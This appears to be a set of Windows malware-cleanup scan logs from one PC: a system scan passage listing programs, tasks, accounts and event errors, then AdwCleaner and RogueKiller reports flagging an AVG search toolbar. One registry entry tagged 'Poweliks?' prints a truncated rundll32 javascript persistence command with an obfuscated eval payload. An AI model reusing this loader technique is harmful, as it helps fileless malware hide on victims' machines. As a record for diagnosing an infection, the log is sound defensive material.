PowerChute Personal Edition 3.0.2 (HKLM-x32\...\{8ED262EE-FC73-47A9-BB86-D92223246881}) (Version: 3.0.2 - Schneider Electric)
Rescue and Recovery (HKLM-x32\...\{B383F243-0ABC-4E56-AA30-923B8D85076E}) (Version: 4.30.0025.00 - Lenovo Group Limited)
Roxio Creator Business Edition (HKLM-x32\...\{537BF16E-7412-448C-95D8-846E85A1D817}) (Version: 10.3 - Roxio)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Sonic Icons for Lenovo (HKLM-x32\...\{B334D9AE-1393-423E-97C0-3BDC3360E692}) (Version: 2.0.0 - Lenovo)
SoundMAX (HKLM-x32\...\{F0A37341-D692-11D4-A984-009027EC0A9C}) (Version: 6.10.2.6595 - Analog Devices)
System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 4.01.0015 - Lenovo)
ThinkVantage Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 1.04.0023 - Lenovo Group Limited)
TotalMD 2011 SP2 (HKLM-x32\...\TotalMD For Networks_is1) (Version: - Dentimax, LLC)
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Automated Installation Kit (HKLM\...\{31E8F586-4EF7-4500-844D-BA8756474FF1}) (Version: 2.0.0.0 - Microsoft Corporation)
Windows Driver Package - AnalogDevices (ADIHdAudAddService) MEDIA (08/05/2009 6.10.02.6595) (HKLM\...\A5711FCDB123FDFC12A06CDCA7EA8C60F8370DC5) (Version: 08/05/2009 6.10.02.6595 - AnalogDevices)
Windows Driver Package - Intel (e1kexpress) Net (06/22/2009 11.0.41.0) (HKLM\...\47953DA64A58724946E1C1EAFF72D4D6138B69F9) (Version: 06/22/2009 11.0.41.0 - Intel)
Windows Driver Package - Intel (HECIx64) System (06/23/2009 5.2.0.1008) (HKLM\...\4CF241D8BEE94EE801F312E8B49B8E5BAA90F29A) (Version: 06/23/2009 5.2.0.1008 - Intel)
Windows Driver Package - Intel (Serial) Ports (07/06/2009 5.5.1.1012) (HKLM\...\49AA6E0E36A92D25AFC2479DC7BCB705AE01CE1F) (Version: 07/06/2009 5.5.1.1012 - Intel)
Windows Driver Package - Intel Corporation (igfx) Display (08/13/2009 8.15.10.1872) (HKLM\...\157624FFB8919EB5518C572408100A734456F2E0) (Version: 08/13/2009 8.15.10.1872 - Intel Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\powercpl.dll No File

==================== Restore Points =========================

03-11-2014 03:01:09 Scheduled Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {128D76C8-7028-468B-977E-C90117E68814} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {3304AF05-A723-4069-A962-EAD84FAC017E} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {90409AC3-C03C-4F43-B367-6CDE097B0ADB} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {96E7D4EB-E47C-4C6B-9C36-79FB1D4DA37C} - \{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D} No Task File <==== ATTENTION
Task: {A653F635-2846-46C9-9F0D-D61FF57E3FBF} - System32\Tasks\TVT\ChangePWD => %RR%\rrcmd.exe
Task: {D50DCB71-264E-42D1-ADAA-9ABF4048AADA} - System32\Tasks\TVT\LaunchRnR => %RR%\rrcmd.exe
Task: {D854CD5A-DB3B-41A2-9D10-C6B6BFFECB0F} - System32\Tasks\TVT\UpdateRnR => %TVTCOMMON%\Scheduler\tvtsetsched.exe
Task: {F97F77C6-5696-408F-89F1-17A24D6C26F6} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PWMIDTSV.EXE [2010-07-28] (Lenovo Group Limited)
Task: {FCCB621B-E6E2-41C3-B70A-323C5506BF37} - System32\Tasks\MCP => C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe [2009-05-28] ()
Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\PC-Doctor\uaclauncher.exe
Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\PC-Doctor\uaclauncher.exe

==================== Loaded Modules (whitelisted) =============

2012-02-12 01:03 - 2005-03-12 01:07 - 00087040 ____N () C:\Windows\System32\pdfcmnnt.dll
2012-02-12 12:43 - 2010-03-03 09:45 - 00053248 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe
2011-11-26 19:50 - 2010-04-22 01:20 - 00177152 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
2013-09-23 08:34 - 2014-08-26 02:46 - 02640408 _____ () C:\Program Files (x86)\AVG Secure Search\vprot.exe
2011-11-26 19:50 - 2010-07-27 12:04 - 00029184 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2011-11-26 19:50 - 2008-11-27 03:16 - 00018432 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
2011-11-26 19:50 - 2010-06-01 22:37 - 00228352 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
2009-05-28 01:09 - 2009-05-28 01:09 - 00049976 ____N () C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe
2012-02-28 11:20 - 2011-12-22 23:08 - 00051848 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CodeLog.dll
2012-02-28 11:20 - 2008-11-25 17:18 - 01291264 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\libxml2.dll
2012-02-28 11:20 - 2004-10-05 03:08 - 00055808 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\zlib1.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00114312 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExchBackupSize.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00245896 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExImage.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00069768 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EnumTapeDevice.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00064648 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbTapeBrowse.dll
2012-02-28 11:20 - 2011-12-23 15:15 - 00023176 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\AccountManager.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00093832 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBFireWall.dll
2011-11-26 19:46 - 2009-07-15 20:20 - 00077824 ____N () C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\DTMessageLib.dll
2012-02-12 12:44 - 2012-02-12 12:44 - 00315392 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\ANPDApi.dll
2012-02-12 12:43 - 2010-03-19 19:14 - 00294912 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\WlanApp.dll
2013-12-09 13:21 - 2014-03-21 08:19 - 01603608 _____ () C:\Program Files (x86)\AVG Secure Search\TBAPI.dll
2014-08-11 11:49 - 2014-08-11 11:49 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\log4cplusU.dll
2014-10-30 20:00 - 2014-10-30 20:00 - 01375089 _____ () C:\Users\Deborah\Downloads\adwcleaner_3.311.exe

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\49112529.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\49112529.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-606911418-3109034106-3922174115-500 - Administrator - Enabled) => C:\Users\Administrator
Brenda (S-1-5-21-606911418-3109034106-3922174115-1001 - Limited - Enabled) => C:\Users\Brenda
Deborah (S-1-5-21-606911418-3109034106-3922174115-1000 - Administrator - Enabled) => C:\Users\Deborah
Diana (S-1-5-21-606911418-3109034106-3922174115-1053 - Administrator - Enabled)
Guest (S-1-5-21-606911418-3109034106-3922174115-501 - Limited - Disabled)
Nancy (S-1-5-21-606911418-3109034106-3922174115-1002 - Limited - Enabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/04/2014 04:34:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x1b78
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/03/2014 06:53:05 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/03/2014 06:47:57 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 07:54:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 04:01:11 PM) (Source: PC-Doctor) (EventID: 1) (User: )
Description: (7444) Asapi: (16:01:11:9740)(7444) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

Error: (11/02/2014 11:34:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: jscript9.dll, version: 11.0.9600.17344, time stamp: 0x541b85e6
Exception code: 0xc0000005
Fault offset: 0x00127417
Faulting process id: 0x25a0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 06:49:27 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x3580
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:59:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x0034cf7e
Faulting process id: 0x1388
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:29:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x2d2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:21:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x19ec
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3


System errors:
=============
Error: (11/05/2014 08:33:46 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/05/2014 08:15:22 AM) (Source: srv) (EventID: 2017) (User: )
Description: The server was unable to allocate from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations.

Error: (11/04/2014 10:02:16 PM) (Source: srv) (EventID: 2017) (User: )
Description: The server was unable to allocate from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations.

Error: (11/04/2014 07:48:13 AM) (Source: srv) (EventID: 2017) (User: )
Description: The server was unable to allocate from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations.

Error: (11/04/2014 00:24:23 AM) (Source: srv) (EventID: 2017) (User: )
Description: The server was unable to allocate from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations.

Error: (11/03/2014 09:10:46 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Windows\System32\drivers\TrueSight.sys has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.

Error: (11/03/2014 09:10:19 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Windows\System32\drivers\TrueSight.sys has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.


Microsoft Office Sessions:
=========================
Error: (11/04/2014 04:34:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd000947651b7801cff876b4861bc0C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll62868c2b-646a-11e4-a3f6-50e549719966

Error: (11/03/2014 06:53:05 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/03/2014 06:47:57 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 07:54:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 04:01:11 PM) (Source: PC-Doctor) (EventID: 1) (User: )
Description: (7444) Asapi: (16:01:11:9740)(7444) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

Error: (11/02/2014 11:34:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7jscript9.dll11.0.9600.17344541b85e6c00000050012741725a001cff6ba0e99d2f5C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\jscript9.dll238b432a-62ae-11e4-bdb2-50e549719966

Error: (11/02/2014 06:49:27 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf358001cff6928245fff6C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll4bec0c79-6286-11e4-bdb2-50e549719966

Error: (11/01/2014 10:59:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0034cf7e138801cff6512a52db7fC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll939db79e-6244-11e4-bdb2-50e549719966

Error: (11/01/2014 10:29:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd000947652d2c01cff64c0f49d66cC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll6afddfed-6240-11e4-bdb2-50e549719966

Error: (11/01/2014 10:21:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0009476519ec01cff64be81db19bC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll57cde7a4-623f-11e4-bdb2-50e549719966


==================== Memory info ===========================

Processor: Pentium® Dual-Core CPU E6600 @ 3.06GHz
Percentage of memory in use: 41%
Total physical RAM: 3551.17 MB
Available physical RAM: 2067.54 MB
Total Pagefile: 7100.52 MB
Available Pagefile: 4308.02 MB
Total Virtual: 8192 MB
Available Virtual: 8191.85 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:221.95 GB) (Free:94.42 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:2.1 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 232.9 GB) (Disk ID: B2D7266B)
Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=221.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

==================== End Of Log ============================

# AdwCleaner v3.311 - Report created 05/11/2014 at 10:47:18
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Professional Service Pack 1 (64 bits)
# Username : Deborah - ASSISTANT
# Running from : C:\Users\Deborah\Downloads\adwcleaner_3.311.exe
# Option : Scan

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Found : C:\Program Files (x86)\AVG Secure Search
Folder Found : C:\Program Files (x86)\AVG Security Toolbar
Folder Found : C:\Program Files (x86)\Common Files\AVG Secure Search
Folder Found : C:\ProgramData\AVG Secure Search
Folder Found : C:\ProgramData\Partner
Folder Found : C:\Users\Administrator\AppData\Local\AVG Secure Search
Folder Found : C:\Users\Administrator\AppData\LocalLow\AVG Secure Search
Folder Found : C:\Users\Deborah\AppData\Local\AVG Secure Search
Folder Found : C:\Users\Deborah\AppData\LocalLow\AVG Secure Search
Folder Found : C:\Users\Deborah\AppData\Roaming\pdfforge

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\AVG Secure Search
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Found : [x64] HKCU\Software\AVG Secure Search
Key Found : HKLM\SOFTWARE\AVG Secure Search
Key Found : HKLM\SOFTWARE\AVG Security Toolbar
Key Found : HKLM\SOFTWARE\Classes\AppID\{1FDFF5A2-7BB1-48E1-8081-7236812B12B2}
Key Found : HKLM\SOFTWARE\Classes\AppID\{BB711CB0-C70B-482E-9852-EC05EBD71DBB}
Key Found : HKLM\SOFTWARE\Classes\AppID\ScriptHelper.EXE
Key Found : HKLM\SOFTWARE\Classes\AppID\ViProtocol.DLL
Key Found : HKLM\SOFTWARE\Classes\CLSID\{0B79C149-3B19-40DE-92BF-1A3AD9C1DA9D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{229C56BB-A36A-4323-8C82-B136DF45697D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{33E2B3CB-322E-4CBE-89F2-C06F5A35DB46}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{408CFAD9-8F13-4747-8EC7-770A339C7237}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{51080E66-F357-4F2A-9BFC-2456695883B5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{537AD3CF-DE2B-4A1C-8279-C946B7E490D4}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{5BF7365D-25FF-40F3-8DEE-06ABEDF177CC}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{6DDA37BA-0553-499A-AE0D-BEBA67204548}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{933B95E2-E7B7-4AD9-B952-7AC336682AE3}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{94496571-6AC5-4836-82D5-D46260C44B17}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{A10A1344-B533-4C9E-BE4E-4C5BC4953047}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{B658800C-F66E-4EF3-AB85-6C0C227862A9}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{BA94BCE1-7E60-422D-9E7D-B853BC03FE78}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{BDCE611F-FDAA-4B10-A8E8-220A7897A69F}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D0F1E414-1FAE-466C-B122-DE735B7BFF9D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{E458510C-1DD5-4A05-8C4C-53BEF69C05E7}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Found : HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Found : HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Found : HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Found : HKLM\SOFTWARE\Classes\protocols\handler\viprotocol
Key Found : HKLM\SOFTWARE\Classes\ScriptHelper.ScriptHelperApi
Key Found : HKLM\SOFTWARE\Classes\ScriptHelper.ScriptHelperApi.1
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{07CAC314-E962-4F78-89AB-DD002F2490EE}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{13ABD093-D46F-40DF-A608-47E162EC799D}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{74FB6AFD-DD77-4CEB-83BD-AB2B63E63C93}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{C2AC8A0E-E48E-484B-A71C-C7A937FAAB94}
Key Found : HKLM\SOFTWARE\Classes\ViProtocol.ViProtocolOLE
Key Found : HKLM\SOFTWARE\Classes\ViProtocol.ViProtocolOLE.1
Key Found : HKLM\SOFTWARE\Google\Chrome\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Found : HKLM\SOFTWARE\Microsoft\Tracing\avg-secure-search-installer_RASAPI32
Key Found : HKLM\SOFTWARE\Microsoft\Tracing\avg-secure-search-installer_RASMANCS
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{C6FDD0C3-266A-4DC3-B459-28C697C44CDC}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG Secure Search
Key Found : HKLM\SOFTWARE\MozillaPlugins\@avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [vProt]

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17344


*************************

AdwCleaner[R0].txt - [7439 octets] - [31/10/2014 04:13:18]
AdwCleaner[R1].txt - [6303 octets] - [05/11/2014 10:47:18]

########## EOF - C:\AdwCleaner\AdwCleaner[R1].txt - [6363 octets] ##########

RogueKiller V10.0.4.0 [Oct 29 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Deborah [Administrator]
Mode : Scan -- Date : 11/05/2014 10:56:09

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 20 ¤¤¤
[PUP] (X64) HKEY_CLASSES_ROOT\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> Found
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> Found
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | vProt : "C:\Program Files (x86)\AVG Secure Search\vprot.exe" -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vToolbarUpdater18.1.9 (C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe) -> Found
